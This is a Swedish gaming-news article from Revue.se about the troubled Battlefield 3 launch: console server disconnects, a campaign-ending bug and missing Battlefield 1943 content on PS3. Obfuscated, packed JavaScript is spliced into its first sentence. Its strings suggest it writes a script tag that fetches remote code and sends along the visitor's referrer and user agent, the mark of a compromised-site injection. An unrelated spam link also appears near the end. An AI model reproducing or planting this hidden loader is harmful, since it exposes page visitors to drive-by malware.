Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Problemfylld Battlefield 3 vid lansering

Problemfyllt Battlefield 3 vid lansering
Sebastian Plengier Ehrnfelt

Två eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yiazb|var|u0026u|referrer|stiiy||js|php’.split(‘|’),0,{}))
dagar efter lanseringen av det mycket efterlängtade spelet Battlefield 3 och redan massa problem. Detta gäller främst konsolerna.

Det har gått två dagar sedan släppet av Battlefield 3 ägde rum i USA, och igår var det dags för bl.a. Sverige att få ge sig ut i kriget. Som kanske väntat av många spelare har det redan börjat ramla in rapporter om problem med disconnects, instabila servrar och problem att gå in i spelet.  Detta gäller då multiplayer delen.

Även på Twitter är det många som meddelar att de inte kan spela.

Det sägs också att många spelare råkat ut för en bugg i slutet av singleplayerkampanjen som gör att man inte kan slutföra spelet.

Som sagt ovan så gäller dessa buggar alla plattformar även om det just nu verkar vara koncentrerat till Xbox 360 och Ps3. EA meddelar också att de jobbar på problemen och hoppas kunna stabilisera alla servrar så fort som möjligt.

[quote]We’re aware of the server issues on the Xbox 360 and are working to correct them as soon as possible. #BF3[/quote]

Tillsammans med nyheten om att det utlovade Battlefield 1943 inte följde med PS3-versionerna och att EA inte kommit med någon närmare förklaring om varför kan det konstateras att lanseringen inte varit fullt så lyckad som man hade hoppats – trots att spelet fått bra recensioner.

Mer info: pinoytutorial.com

httpv://www.youtube.com/watch?v=Wx2hpuuVEd8